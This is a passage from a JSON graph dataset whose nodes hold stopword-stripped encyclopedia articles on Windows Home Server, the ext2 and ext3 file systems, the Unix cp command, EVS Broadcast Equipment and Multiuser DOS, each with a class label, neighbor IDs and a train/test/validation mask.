specifically configure family home server dealt storage two levels shared folders disks concepts relevant regarding disks whether added home server storage pool whether disk appeared healthy system contrast windows logical disk manager requires greater degree technical understanding order correctly configure raid array shared folders name description permissions flag indicating whether duplication redundancy folder duplication shared folder default multi-disk home server systems applicable single disk systems files shared folder duplicated effective storage capacity halved however situations user may wanted data duplicated e.g tv shows archived windows home server system running windows media center drive extender provided capability duplicate files server short capacity manually mark complete content store duplication known limitation drive extender cases changed timestamp directories files data moved around disks according microsoft expected behaviour caused unexpected behaviour using clients sort media based date examples xbmc mediaportal squeezebox server aforementioned programs worked fine whs however files may appeared order due caveat 23 november 2010 microsoft announced drive extender would removed windows home server 2011 led public outcry announcement comments section criticism drive extender removal mainly related seen core feature windows home server key reason adoption replacement drive extender microsoft stated oems would use raid windows home server products windows home server computer backup automatically backs computers home server using image-based system ensures point-in-time-based restoration either entire pcs specific files folders complete bare-metal restores initiated restore bootable cd file based restores initiated whs client software allows users open backup drag drop files technology uses volume shadow services vss technology client computer take image based backup running computer backup operates data cluster level single instancing performed minimize amount data travels network ultimately stored home server single instancing gives server ability store one instance data matter data originated another computer another file even data within file computer backup images duplicated server server hard drive fails backups could lost server backup feature added power pack 1 include duplication backup images system also offers ssl secured web browser based interface internet shared file stores release version offers access web interface via free windows live-provided url uses dynamic dns web interface also allows uploading downloading files content stores however limit 2 gb single batch upload system also supports terminal services gateway allowing remote control desktop windows computer home network currently supported systems would normally support remote desktop windows xp professional tablet media center editions windows vista business enterprise ultimate editions windows 7 professional enterprise ultimate editions web interface also supports embedding remote desktop activex control provide remote access home computers within web interface directly remote sessions also connect home server console configure server internet windows home server allows developers publish community commercial add-ins designed enhance windows home server added functionality january 2010 nearly 100 add-ins developed whs including applications antivirus security backups disk management automation media network/power management remote access bittorrent windows home server sdk software development kit provides developers set apis tools use developing extending windows home server windows home server features integration windows xp sp2 newer windows vista windows 7 release power pack 3 software installation either client cd via network share connector software may also installed accessing codice_1 link provided download connector software install troubleshooting tools files stored windows home server also available windows share opening compatibility wide variety operating systems also administration console available via remote desktop allowing administration unsupported platforms windows home server support microsoft security essentials 64-bit windows client support introduced power pack 1 though restore wizard windows home server restore cd unable restore clients running 64-bit operating systems due fact restore cd support 64-bit drivers windows xp professional x64 n't officially supported however unofficial workarounds allow connector software work xp x64 integration file sharing service location mac os x time machine apparently considered upon mac os x leopard release apple removed ability use smb file sharing protocol time machine backups one whs provider hp provides plug-in home server line capable time machine backup home server windows home server officially supported domain controller capability readily join windows server domain wireless networking supported dedicated devices operating system pre-installed may supplied server recovery disk reloads os network connection utilized hp mediasmart server fujitsu siemens scaleo home server first release windows home server rtm release manufacturing suffered file corruption flaw whereby files saved directly edited shares whs device could become corrupted files ntfs alternate data streams susceptible flaw flaw led data corruption server heavy load time file ads saved onto share backups client pcs made windows home server susceptible flaw even though issue first acknowledged october 2007 microsoft formally warned users seriousness flaw 20 december 2007 microsoft issued list applications including windows live photo gallery microsoft onenote microsoft outlook synctoy 2.0 might triggered flaw used edit files whs share directly issue fixed power pack 1 released 21 july 2008 windows home server rtm include mechanism backing server power pack 1 added ability back files stored shared folders external drive users also subscribe 3rd-party online services fee however remains way back installed server operating system backing-up client backup database available either manually using instructions provided microsoft page 24 document done using whs bdbb add-in written alex kuretz available website hardware manufacturers developed dedicated boxes microsoft also released windows home server oem/system builder license november 2008 microsoft lowered price whs system builder sku us 100 users also choose use existing pc build systems would include use whs system builder 23 march 2009 microsoft also made windows home server available msdn microsoft technet subscribers computer systems available bundled windows home server license case versions windows possible request refund license fees paid windows home server",
    "neighbors": [
      8576,
      641,
      2179,
      3463,
      5384,
      1417,
      651,
      6797,
      8080,
      2193,
      3857,
      6675,
      7057,
      8976,
      10896,
      11283,
      4505,
      5145,
      9757,
      4126,
      10270,
      7970,
      4515,
      11301,
      3366,
      8998,
      3496,
      6441,
      6697,
      10026,
      1581,
      7983,
      3250,
      3890,
      9910,
      10747,
      6462,
      7615,
      321,
      7106,
      8129,
      582,
      1098,
      10957,
      1358,
      9173,
      11605,
      2391,
      4439,
      3289,
      4316,
      8798,
      11103,
      4704,
      5600,
      7905,
      10338,
      2919,
      8296,
      5225,
      4074,
      8299,
      9448,
      10989,
      5103,
      3314,
      5363,
      7796,
      6265,
      8315,
      636,
      639
    ],
    "mask": "Test"
  },
  {
    "node_id": 2197,
    "label": 6,
    "text": "Ext2:ext2 ext2 second extended file system file system linux kernel initially designed rémy card replacement extended file system ext designed according principles berkeley fast file system bsd first commercial-grade filesystem linux canonical implementation ext2 ext2fs filesystem driver linux kernel implementations varying quality completeness exist gnu hurd minix 3 bsd kernels mint third-party microsoft windows macos drivers ext2 default filesystem several linux distributions including debian red hat linux supplanted recently ext3 almost completely compatible ext2 journaling file system ext2 still filesystem choice flash-based storage media sd cards usb flash drives lack journal increases performance minimizes number writes flash devices limited number write cycles however recent linux kernels support journal-less mode ext4 provides benefits found ext2 early development linux kernel made cross-development minix operating system minix file system used linux first file system minix file system mostly free bugs used 16-bit offsets internally thus maximum size limit 64 megabytes also filename length limit 14 characters limitations work began replacement native file system linux ease addition new file systems provide generic file api vfs virtual file system layer added linux kernel extended file system ext released april 1992 first file system using vfs api included linux version 0.96c ext file system solved two major problems minix file system maximum partition size filename length limitation 14 characters allowed 2 gigabytes data filenames 255 characters still problems support separate timestamps file access inode modification data modification solution problems two new filesystems developed january 1993 linux kernel 0.99 xiafs second extended file system ext2 overhaul extended file system incorporating many ideas berkeley fast file system ext2 also designed extensibility mind space left many on-disk data structures use future versions since ext2 testbed many new extensions vfs api features withdrawn posix draft acl proposal withdrawn extended attribute proposal generally implemented first ext2 relatively simple extend internals well understood linux kernels prior 2.6.17 restrictions block driver mean ext2 filesystems maximum file size 2 tib ext2 still recommended journaling file systems bootable usb flash drives solid-state drives ext2 performs fewer writes ext3 journaling major aging factor flash chip number erase cycles erase cycles happen frequently writes decreasing writes increases life span solid-state device another good practice filesystems flash devices use noatime mount option reason space ext2 split blocks blocks grouped block groups analogous cylinder groups unix file system typically thousands blocks large file system data given file typically contained within single block group possible done minimize number disk seeks reading large amounts contiguous data block group contains copy superblock block group descriptor table block groups contain block bitmap inode bitmap inode table finally actual data blocks superblock contains important information crucial booting operating system thus backup copies made multiple block groups file system however typically first copy found first block file system used booting group descriptor stores location block bitmap inode bitmap start inode table every block group turn stored group descriptor table every file directory represented inode term inode comes index node time became i-node inode inode includes data size permission ownership location disk file directory example ext2 inode structure quote linux kernel documentation ext2 pointers first 12 blocks contain file data inode pointer indirect block contains pointers next set blocks pointer doubly indirect block pointer trebly indirect block thus structure ext2 15 pointers pointers 1 12 point direct blocks pointer 13 points indirect block pointer 14 points doubly indirect block pointer 15 points triply indirect block directory list directory entries directory entry associates one file name one inode number consists inode number length file name actual text file name find file directory searched front-to-back associated filename reasonable directory sizes fine large directories inefficient ext3 offers second way storing directories htree efficient list filenames root directory always stored inode number two file system code find mount time subdirectories implemented storing name subdirectory name field inode number subdirectory inode field hard links implemented storing inode number one file name accessing file either name results inode number therefore data special directories current directory .. parent directory implemented storing names .. directory inode number current parent directories inode field special treatment two entries receive automatically created new directory made deleted new file directory created ext2 must decide store data disk mostly empty data stored almost anywhere however clustering data related data minimize seek times maximize performance ext2 attempts allocate new directory group containing parent directory theory accesses parent children directories likely closely related ext2 also attempts place files group directory entries directory accesses often lead file accesses however group full new file new directory placed non-full group data blocks needed store directories files found looking data allocation bitmap needed space inode table found looking inode allocation bitmap reason limits ext2 file format data operating system kernel mostly factors determined file system built depend block size ratio number blocks inodes linux block size limited architecture page size also userspace programs handle files larger 2 gib b block size maximum file size limited min b /4 b /4 b /4+12 b 2-1 *512 due i_block structure array direct/indirect ext2_n_blocks i_blocks 32-bit integer value representing number 512-byte blocks file max number sublevel-directories 31998 due link count limit directory indexing available ext2 performance issues directories large number files 10,000+ theoretical limit number files directory 1.3 × 10 although relevant practical situations note linux 2.4 earlier block devices limited 2 tib limiting maximum size partition regardless block size e2compr modification ext2 driver linux kernel support compression decompression files file system without support user applications e2compr small patch ext2 e2compr compresses regular files administrative data superblock inodes directory files etc compressed mainly safety reasons access compressed blocks provided read write operations compression algorithm cluster size specified per-file basis directories also marked compression case every newly created file directory automatically compressed cluster size algorithm specified directory e2compr new file system patch ext2 made support ext2_compr_fl flag require user make new partition continue read write existing ext2 file systems one consider simply way read write routines access files could created simple utility similar gzip compress compressed uncompressed files coexist nicely ext2 partitions latest e2compr-branch available current releases linux 2.4 2.6 3.0 latest patch linux 3.0 released august 2011 provides multicore high memory support also branches linux 2.0 2.2 access ext2 partitions microsoft windows possible installable file system ext2ifs ext2fsd filesystem userspace used macos",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      5661,
      9249,
      9762,
      2597,
      5158,
      5167,
      7225,
      2107,
      11323,
      8254,
      8772,
      3662,
      1109,
      10851,
      4708,
      8298,
      9836,
      7789,
      5743,
      6768,
      6771,
      9333,
      6263,
      9335,
      9848,
      3708,
      2687,
      8832,
      9343,
      5256,
      9353,
      7818,
      6797,
      654,
      2193,
      2194,
      2199,
      6808,
      6297,
      4763,
      11419,
      671,
      6309,
      1190,
      5286,
      10405,
      7339,
      5293,
      7344,
      8369,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      3300,
      7907,
      4841,
      8938,
      10476,
      1263,
      3312,
      3826,
      2291,
      246,
      1782,
      3834,
      251,
      3328,
      11012,
      2314,
      1291,
      8461,
      6416,
      1810,
      3859,
      6935,
      11033,
      287,
      1825,
      6434,
      4387,
      292,
      5413,
      6947,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      10570,
      4431,
      5969,
      6995,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      11135,
      2432,
      7554,
      8075,
      7565,
      6545,
      11667,
      5013,
      9625,
      4506,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      1456,
      11184,
      8114,
      7603,
      8115,
      8631,
      1464,
      1978,
      2494,
      9151,
      8129,
      8643,
      6100,
      7126,
      2015,
      7136,
      8676,
      1509,
      9189,
      492,
      10732,
      7663,
      11256,
      2555,
      3068,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 2198,
    "label": 6,
    "text": "Cp_(Unix):cp unix computing codice_1 command various unix unix-like operating systems copying files directories command three principal modes operation expressed types arguments presented program copying file another file one files directory copying entire directories another directory utility accepts various command line option flags detail operations performed two major specifications posix cp gnu cp gnu cp many additional options posix version command also available efi shell cp part version 1 unix version codice_1 bundled gnu coreutils written torbjorn granlund david mackenzie jim meyering cp three principal modes operation modes inferred type count arguments presented program upon invocation copying file another file copying file directory copying directory directory -r -r must used creating copy file current directory copies prog.c prog.bak prog.bak file already exist cp command creates exist cp command replaces contents contents prog.c file copy two files current directory another directory copies files jones /home/nick/clients/jones smith /home/nick/clients/smith copy file new file preserve modification date time access control list associated source file copies smith file smith.jr file instead creating file current date time stamp system gives smith.jr file date time smith file smith.jr file also inherits smith file access control protection copy directory including files subdirectories another directory copies directory clients including files subdirectories files subdirectories directory customers/clients unix systems behave differently mode depending termination directory paths using codice_3 gnu system behaves expected however bsd system copies contents clients directory instead directory clients happens gnu bsd systems path source directory ends .. without trailing slash copying file existing file performed opening existing file update mode thereby preserving files inode requires write access results target file retaining permissions originally",
    "neighbors": [
      2432,
      515,
      516,
      1412,
      9733,
      9735,
      3976,
      521,
      5256,
      6281,
      6664,
      4750,
      11663,
      4369,
      10387,
      5397,
      6812,
      7196,
      10564,
      4001,
      6138,
      2599,
      7847,
      8236,
      4398,
      7983,
      1336,
      8504,
      6459,
      7356,
      3522,
      451,
      1987,
      965,
      2245,
      8517,
      8772,
      9542,
      5706,
      3659,
      8522,
      1741,
      10447,
      5969,
      9298,
      3412,
      1750,
      10967,
      9946,
      6369,
      8675,
      10727,
      6120,
      5482,
      491,
      8954,
      1902,
      3056,
      11249,
      4850,
      5106,
      5492,
      8306,
      8692,
      9204,
      10101,
      10484,
      506,
      5759
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2199,
    "label": 6,
    "text": "Ext3:ext3 ext3 third extended filesystem journaled file system commonly used linux kernel used default file system many popular linux distributions stephen tweedie first revealed working extending ext2 journaling linux ext2fs filesystem 1998 paper later february 1999 kernel mailing list posting filesystem merged mainline linux kernel november 2001 2.4.15 onward main advantage ext2 journaling improves reliability eliminates need check file system unclean shutdown successor ext4 performance speed ext3 less attractive competing linux filesystems ext4 jfs reiserfs xfs ext3 significant advantage allows in-place upgrades ext2 without backup restore data benchmarks suggest ext3 also uses less cpu power reiserfs xfs also considered safer linux file systems due relative simplicity wider testing base ext3 adds following features ext2 without features ext3 file system also valid ext2 file system situation allowed well-tested mature file system maintenance utilities maintaining repairing ext2 file systems also used ext3 without major changes ext2 ext3 file systems share standard set utilities e2fsprogs includes fsck tool close relationship also makes conversion two file systems forward ext3 backward ext2 straightforward ext3 lacks modern filesystem features dynamic inode allocation extents situation might sometimes disadvantage recoverability significant advantage file system metadata fixed well-known locations data structures redundancy significant data corruption ext2 ext3 may recoverable tree-based file system may maximum number blocks ext3 2 size block vary affecting maximum number files maximum size file system three levels journaling available linux implementation ext3 three modes internal structure file system assured consistent even crash case data content files directories modified system crashed affected rest intact recovery ext3 aims backward-compatible earlier ext2 many on-disk structures similar ext2 consequently ext3 lacks recent features extents dynamic allocation inodes block sub-allocation directory 31998 subdirectories inode 32,000 links direct subdirectory increases parent folder inode link counter .. reference ext3 like current linux filesystems fsck-ed filesystem mounted writing attempting check filesystem already mounted read/write mode likely detect inconsistencies filesystem metadata filesystem metadata changing fsck applies changes attempt bring inconsistent metadata consistent state attempt fix inconsistencies corrupt filesystem online ext3 defragmentation tool works filesystem level offline ext2 defragmenter codice_1 requires ext3 filesystem converted back ext2 first however codice_1 may destroy data depending feature bits turned filesystem know handle many newer ext3 features userspace defragmentation tools like shake defrag shake works allocating space whole file one operation generally cause allocator find contiguous disk space files used time shake try write next one another defrag works copying file however strategy works file system enough free space true defragmentation tool exist ext3 however linux system administrator guide states modern linux filesystem keep fragmentation minimum keeping blocks file close together even ca n't stored consecutive sectors filesystems like ext3 effectively allocate free block nearest blocks file therefore necessary worry fragmentation linux system ext3 resistant file fragmentation ext3 get fragmented time specific usage patterns like slowly writing large files consequently ext4 successor ext3 online filesystem defragmentation utility e4defrag currently supports extents contiguous file regions ext3 support recovery deleted files ext3 driver actively deletes files wiping file inodes crash safety reasons still several techniques free proprietary software recovery deleted lost files using file system journal analysis however guarantee specific file recovery e3compr unofficial patch ext3 transparent compression direct port e2compr still needs development compiles boots well upstream kernels journaling implemented yet unlike number modern file systems ext3 native support snapshots ability quickly capture state filesystem arbitrary times instead relies less-space-efficient volume-level snapshots provided linux lvm next3 file system modified version ext3 offers snapshots support yet retains compatibility ext3 on-disk format ext3 checksumming writing journal storage device extra cache barrier=1 enabled mount option /etc/fstab hardware out-of-order write caching one runs risk severe filesystem corruption crash storage devices write caches report system data completely written even written volatile cache hard disk writes done out-of-order due modern hard disks caching writes order amortize write speeds likely one write commit block transaction relevant blocks written power failure unrecoverable crash occur blocks get written system rebooted upon reboot file system replay log normal replay winners transactions commit block including invalid transaction happened tagged valid commit block unfinished disk write thus proceed using corrupt journal data file system thus mistakenly overwrite normal data corrupt data replaying journal checksums used blocks fake winner transaction tagged mutual checksum file system could known better replayed corrupt data onto disk journal checksumming added ext4 filesystems going device mapper interface including software raid lvm implementations may support barriers issue warning mount option used also disks properly implement write cache flushing extension necessary barriers work causes similar warning situations barriers supported practical reliable write ordering possible turning disk write cache using mount option turning disk write cache may required even barriers available applications like databases expect call fsync flush pending writes disk barrier implementation n't always clear drive write cache response call also potential issue barrier implementation related error handling events drive failure also known sometimes virtualization technologies properly forward fsync flush commands underlying devices files volumes disk guest operating system similarly hard disks controllers implement cache flushing incorrectly still advertise supported return error used many ways handle fsync write cache handling incorrectly safer assume cache flushing work unless explicitly tested regardless reliable individual components believed ext3 stores dates unix time using four bytes file header 32 bits give enough scope continue processing files beyond january 18 2038 year 2038 problem geek millennium expected cause widespread disruption dealt timely fashion june 28 2006 theodore ts principal developer ext3 announced enhanced version called ext4 october 11 2008 patches mark ext4 stable code merged linux 2.6.28 source code repositories marking end development phase recommending adoption 2008 ts stated although ext4 improved features much faster ext3 major advance uses old technology stop-gap ts believes btrfs better direction offers improvements scalability reliability ease management btrfs also number design ideas reiser3/4",
    "neighbors": [
      5120,
      2051,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      2597,
      5158,
      7225,
      2107,
      11323,
      8254,
      8260,
      8772,
      3142,
      3656,
      7244,
      3662,
      1109,
      5206,
      10851,
      4708,
      8298,
      9836,
      7789,
      6768,
      9333,
      6263,
      9335,
      3708,
      9343,
      5256,
      7818,
      6797,
      654,
      2193,
      2194,
      8852,
      2197,
      6808,
      6297,
      11419,
      3745,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      4789,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      5840,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      3802,
      8410,
      6365,
      739,
      3300,
      7907,
      4841,
      8938,
      10476,
      1263,
      1775,
      3312,
      3826,
      2291,
      246,
      1782,
      3834,
      3328,
      11012,
      2314,
      1291,
      8461,
      6416,
      1810,
      3859,
      6935,
      11033,
      287,
      1825,
      6434,
      6947,
      5413,
      3366,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      11082,
      4431,
      5969,
      346,
      2395,
      2397,
      5474,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      10109,
      11135,
      7554,
      8075,
      7565,
      6545,
      11667,
      5013,
      9625,
      4506,
      11675,
      6044,
      11676,
      414,
      927,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      1456,
      11184,
      8114,
      7603,
      8631,
      1464,
      1978,
      2494,
      8643,
      7126,
      1501,
      2015,
      7136,
      1509,
      9189,
      491,
      492,
      10732,
      7663,
      5106,
      11256,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 2200,
    "label": 7,
    "text": "EVS_Broadcast_Equipment:evs broadcast equipment evs broadcast equipment sa belgian company manufactures live outside broadcast digital video production systems xt3 production video servers enable creation editing exchange playout audio video feeds programming television networks consists primarily broadcasting prerecorded images recently stored tapes linear editing editing tape replaced digital media non-linear editing today digital technology hard disk non-linear definition common alternative clear confirmation migration towards technology years even though still take another 5 6 years hard disk penetration rate increase 30 70 television stations began migrating tapeless interoperable computer platforms beginning late 1990s video recorders rarely used nowadays live productions evs type digital media servers norm live broadcasting evs co-founded 1994 laurent minguet three years later company invested 30 capital private funds roundabout eur 4 million 1998 evs listed first time stock exchange initial eur 14.8 quotation per share comparable levels valued eur 204 million year evs acquired vse hardware subcontractor managed michel counson transaction vse received evs shares approximate eur 4.5 million value since evs become major broadcast actor focusing digital recording technologies live sport tv production evs core products primarily used outbroadcasting vans ob vans allow high-quality respectively slow-motion image replay evs revolutionised professional digital recording first introduce hard disk drive field instead traditional magnetic tape recording business led time sony panasonic establishing outbroadcasting sport production evs started using high value servers address tv studio production full range products 2002 strategic move contributed +40 uplift 2012 additionally evs founded xdc 2004 pioneer high definition cinema broadcasting restructured within dcinex group evs sold stake dcinex 2014 2001 laurent minguet stepped position director three years later gave position side decided leave role ceo director following board directors meeting held september 15 2011 transitional period evs managed board directors 2012 evs appoints joop janssen ceo 10 october 2014 board directors joop janssen mutually agreed end term office duties joop janssen muriel de lathouwer member board directors evs chairing strategy committee appointed president executive committee interim basis 5 january 2015 evs announced acquired scalable video system gmbh svs developing it-based vision mixers dyvi live sa company based brussels distributing products svs name dyvi 19 february 2015 evs broadcast equipment appoints muriel de lathouwer managing director ceo july 17 2018 board directors muriel de lathouwer mutually agreed end term office duties muriel de lathouwer evs headquarters administration production development located liège belgium 4 additional development centers found evs also sales support offices london los angeles new york dubai mexico paris munich madrid brescia beijing hong kong sydney mumbai",
    "neighbors": [
      10948
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2201,
    "label": 2,
    "text": "Multiuser_DOS:multiuser dos multiuser dos real-time multi-user multi-tasking operating system ibm pc-compatible microcomputers evolution older concurrent cp/m-86 concurrent dos concurrent dos 386 operating systems originally developed digital research acquired developed novell 1991 ancestry lies earlier digital research 8-bit operating systems cp/m mp/m 16-bit single-tasking cp/m-86 evolved cp/m novell abandoned multiuser dos 1992 three master value added resellers vars datapac australasia concurrent controls intelligent micro software allowed take continued independent development datapac multiuser dos system manager cci multiuser dos ims multiuser dos real/32 flexos line evolved concurrent dos 286 concurrent dos 68k sold integrated systems inc. isi july 1994 initial version cp/m-86 1.0 bdos 2.x adapted became available ibm pc 1982 commercially unsuccessful ibm pc dos 1.0 offered much facilities considerably lower price like pc dos cp/m-86 fully exploit power capabilities new 16-bit machine soon supplemented implementation cp/m multitasking 'big brother mp/m-86 2.0 since september 1981 turned pc multiuser machine capable supporting multiple concurrent users using dumb terminals attached serial ports environment presented user made seem entire computer since terminals cost fraction then-substantial price complete pc offered considerable cost savings well facilitating multi-user applications accounts stock control time pc networks rare expensive difficult implement cp/m-86 1.1 bdos 2.2 mp/m-86 2.x merged create concurrent cp/m-86 3.0 also known ccp/m-86 bdos 3.0 1982/1983 one designers frank holsworth initially single-user operating system supporting true multi-tasking four default configuration cp/m-86 compatible programs later versions supported dumb terminals could deployed multiuser systems concurrent cp/m-86 3.1 bdos 3.1 shipped 21 february 1984 february 1984 digital research also offered version concurrent cp/m-86 windowing capabilities named concurrent cp/m windows ibm personal computer personal computer xt adaptation concurrent cp/m-86 lsi-m4 lsi octopus cal pc computers machines 16-bit 8-bit processors early days 16-bit personal computing 8-bit software available often ran faster corresponding 16-bit software concurrent cp/m-86/80 allowed users run cp/m 8-bit cp/m-86 16-bit applications command entered operating system ran corresponding application either 8-bit 16-bit processor depending whether executable file .com .cmd extension emulated cp/m environment 8-bit programs translating cp/m system calls cp/m-86 system calls executed 16-bit processor august 1983 bruce skidmore ray pedrizetti dave brown gordon edmonds teamed create pc-mode optional module concurrent cp/m-86 3.1 bdos 3.1 provide basic compatibility pc dos ms-dos shown publicly comdex december 1983 shipped march 1984 concurrent dos 3.1 a.k.a cdos bdos 3.1 hardware vendors simple dos applications directly access screen hardware could run example although console program pkzip worked perfectly offered facilities cp/m-native arc archiver applications performed screen manipulations wordstar word processor dos would native concurrent cp/m cp/m-86 versions required concurrent dos 3.1 4.1 developed us oem adaptations localizations carried dr europe oem support group newbury uk since 1983 digital research positioned concurrent dos 4.1 gem alternative ibm topview 1985 concurrent dos 3.2 bdos 3.2 1984 compatible pc dos 1.x available many different hardware platforms version ibm pc compatible bios/xios named concurrent pc dos 3.2 efforts part cooperation motorola since 1984 led development concurrent dos 68k austin texas successor cp/m-68k written c. concurrent dos 68k 1.0 became available oem evaluation early 1985 effort received considerable funding worth several million dollars motorola designed 68000/68010 processors like earlier gemdos system 68000 processors initially ran motorola vme/10 development system concurrent dos 68k 1.20/1.21 available april 1986 offered 200.000 dollars oems system evolved flexos 68k late 1986 known versions include parallel concurrent dos 68k effort digital research also previewed concurrent dos 286 cooperation intel january 1985 concurrent dos 286 complete rewrite c language based new system architecture dynamically loadable device drivers instead static bios xios one main architects frank holsworth operating system would function strictly 80286 native mode allowing protected mode multi-user multitasking operation running 8086 emulation worked b-1 step prototype chip samples digital research evaluation copies operating system already shipping april discovered problems emulation production level c-1 step processor may would allow concurrent dos 286 run 8086 software protected mode release concurrent dos 286 scheduled late may delayed intel could develop new version chip august extensive testing e-1 step samples 80286 digital research said intel corrected documented 286 errata still undocumented chip performance problems prerelease version concurrent dos 286 running e-1 step intel said approach digital research wished take emulating 8086 software protected mode differed original specifications nevertheless incorporated e-2 step minor changes microcode allowed digital research run emulation mode much faster see loadall limitations affected flexos 286 version 1.x reengineered derivation concurrent dos 286 developed digital research new flexible automation business unit monterey ca since 1986 later versions added compatibility pc dos 2.x 3.x known versions include oem support group relocated digital research newly created european development centre edc hungerford uk 1986 started take development concurrent dos family since concurrent dos 4.11 including siblings like dos plus successors developed hungerford uk versions 5 6 concurrent dos xm xm standing expanded memory could bank switch 8 mb eems provide real-mode environment run multiple cp/m-86 dos programs concurrently support three users one local two hooked via serial terminals 1987 concurrent dos rewritten become concurrent dos 386 still continuation classical xios bdos architecture ran machines equipped intel 80386 later processors using 386 hardware facilities virtualizing hardware allowing dos applications run unmodified concurrent dos 386 even terminals os supported concurrent multiuser file access allowing multiuser applications run individual pcs attached network server concurrent dos 386 allowed single server support number users dumb terminals inexpensive low-specification pcs running terminal emulation software without need expensive workstations then-expensive network cards true multiuser system several users could use single database record locking prevent mutual interference concurrent dos 6.0 represented also starting point dr dos family carved known versions include concurrent pc dos xm 5.0 emulated ibm pc dos 2.10 whereas concurrent dos xm 6.0 concurrent dos 386 2.0 compatible ibm pc dos 3.30 known cci concurrent dos adaptations concurrent controls inc. include adaptations include later versions concurrent dos 386 incorporated enhanced functionality dr later single-user pc dos clone dr dos 5.0 product given explanatory name multiuser dos a.k.a mdos starting version 5.0 bdos 6.5 1991 multiuser dos suffered several technical limitations restricted ability compete lans based pc dos required special device drivers much common hardware pc dos drivers multiuser multi-tasking aware driver installation complex simple pc dos method copying files onto boot disk modifying config.sys appropriately necessary relink multiuser dos kernel known nucleus using sysgen command multiuser dos also unable use many common pc dos additions network stacks limited ability support later developments pc-compatible world graphics adaptors sound cards cd-rom drives mice although many soon rectified example graphical terminals developed allowing users use cga ega vga software less flexible regard network individual pcs prices fell became less less competitive although still offered benefits terms management lower total cost ownership multi-user operating system price higher single-user system course required special device drivers unlike single-user multitasking dos add-ons quarterdeck desqview unlike mp/m never became popular single-user multitasking use novell acquired digital research 1991 abandoned multiuser dos 1992 three master vars datapac australasia concurrent controls intelligent micro software allowed license source code system take continue independent development derivations 1994 known versions include versions digital research novell dr multiuser dos reported ibm pc dos version 3.31 known versions datapac australasia pty limited include 1997 datapac bought citrix systems inc. system manager abandoned soon 2002 sydney-based unit spun citrix advanced products group known cci multiuser dos versions concurrent controls inc. cci include versions cci multiuser dos report ibm pc dos version 3.31 similar setver dos changed using multiuser dos dosver x.y utility 1999 cci changed name applica inc 2002 applica technology became aplycon technologies inc known adaptations ims multiuser dos include versions ims multiuser dos report ibm pc dos version 3.31 intelligent micro software ltd. ims thatcham uk acquired license develop multiuser dos novell 1994 renamed product real/32 1995 similar flexos/4690 os ibm 1995 licensed real/32 7.50 bundle 4695 pos terminals ims real/32 versions real/32 7.50 7.74 report ibm pc dos version 3.31 whereas 7.80 higher report version 6.20 lba fat32 support added real/32 7.90 1999 2002-04-19 intelligent micro software ltd. filed insolvency taken one major customers barry quittenton itera ltd company dissolved 2006-03-28 2010 real/32 supplied integrated solutions thatcham uk company address later listed builders real/ng ims attempt create next generation real/32 also named real/32 internet age real/ng promised increased range hardware pcs x86 multi-processor server systems advertised feature list 2003 10 december 2003 ims made realng v1.60-v1.19-v1.12 available based internet archive seems latest release 2005 realng.com website mirroring ims main website mention real/ng real/32 various releases operating system increasing ability run dos programs software written platform could take advantage features using function calls specifically suitable multiuser operation used pre-emptive multitasking preventing badly-written applications delaying processes retaining control processor day multiuser dos supported popular ssl/tls libraries wolfssl api provided support blocking non-blocking message queues mutual-exclusion queues ability create sub-process threads executed independently parent method pausing execution waste processor cycles unlike idle loops used single-user operating systems applications started attached console however application need user interaction could detach console run background process later reattaching console needed another key feature memory management supported shared memory model processes addition usual models available normal dos programs shared memory model code data sections program isolated code contained modifiable data code sections memory could shared several processes running program thereby reducing memory requirements programs written adapted multitasking platform need avoid technique used single-tasking systems going endless loops interrupted example waiting user press key wasted processor time could used processes instead concurrent dos provided api call process could call sleep period time later versions concurrent dos kernel included idle detection monitored dos api calls determine whether application useful work fact idle case process suspended allowing processes run idle detection catalyst patented dr-dos dynamic idle detection power management feature invented 1989 roger gross john p. constant marketed batterymax",
    "neighbors": [
      6148,
      7173,
      10757,
      10253,
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      5158,
      6187,
      7217,
      9784,
      10809,
      6207,
      576,
      6730,
      10333,
      97,
      5220,
      1126,
      8298,
      8301,
      2672,
      9329,
      7285,
      4727,
      2168,
      9335,
      6778,
      1147,
      11383,
      3197,
      1150,
      2179,
      6276,
      10883,
      9353,
      6797,
      3216,
      9366,
      7319,
      6296,
      2201,
      7325,
      9887,
      7847,
      2729,
      7849,
      3248,
      178,
      6837,
      187,
      8388,
      1221,
      9927,
      9932,
      5840,
      7382,
      8410,
      1247,
      5856,
      2786,
      1253,
      5359,
      4337,
      10482,
      5363,
      11513,
      5371,
      2811,
      3323,
      10499,
      6921,
      780,
      1804,
      273,
      11539,
      2840,
      11550,
      10016,
      2345,
      4394,
      11562,
      10030,
      7983,
      2355,
      9525,
      823,
      4409,
      7483,
      6463,
      7999,
      321,
      10561,
      11075,
      4423,
      6985,
      2380,
      5457,
      11601,
      10067,
      10068,
      341,
      9563,
      10590,
      2399,
      10083,
      8551,
      10087,
      5492,
      1408,
      10113,
      10121,
      394,
      3978,
      7057,
      11667,
      8092,
      9628,
      421,
      11184,
      8115,
      6075,
      6078,
      9151,
      4548,
      8136,
      9162,
      9166,
      6624,
      5603,
      1509,
      3056,
      6128,
      499,
      5619,
      10235
    ],
    "mask": "None"
  },
  {
    "node_id": 2202,
    "label": 4,
